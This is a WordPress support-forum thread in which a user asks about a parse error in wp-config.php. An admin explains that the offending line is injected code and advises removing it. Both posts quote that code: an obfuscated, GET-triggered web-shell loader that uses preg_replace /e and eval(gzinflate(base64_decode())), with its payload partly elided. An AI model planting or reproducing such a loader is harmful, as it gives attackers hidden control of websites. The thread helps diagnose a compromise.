Parse error
-
Hello,
Here is my error :
Parse error: syntax error, unexpected ‘<‘ in /mnt/www/theocean.fr/wp-config.php on line 101
Here is the 101 line :
require_once(ABSPATH . ‘wp-settings.php’);<?php if(isset($_GET[“t2732n”])){ $auth_pass=””;$color=”#df5″;$default_action=”FilesMan”;$default_use_ajax=true;$default_charset=”Windows-1251″;preg_replace(“/.*/e”,”x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28’7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2 (blablabla) i9LbaFz7lC13SwzDxAYT72vwA=’x29x29x29x3B”,”.”); exit; } ?>
Please someone can help me ?
Thank you
Admin
Topic moved to Support. Please post in the correct section next time.
As for your question, it is not an issue with the theme at all. Instead, somebody must have inserted this chunk of code in your
wp-config.phpfile:<?php if(isset($_GET["t2732n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2 (blablabla) i9LbaFz7lC13SwzDxAYT72vwA='x29x29x29x3B","."); exit; } ?>If you (or someone you trust) did not add that code, I suggest you remove it immediately.
Viewing 3 posts - 1 through 3 (of 3 total)
- You must be logged in to reply to this topic.
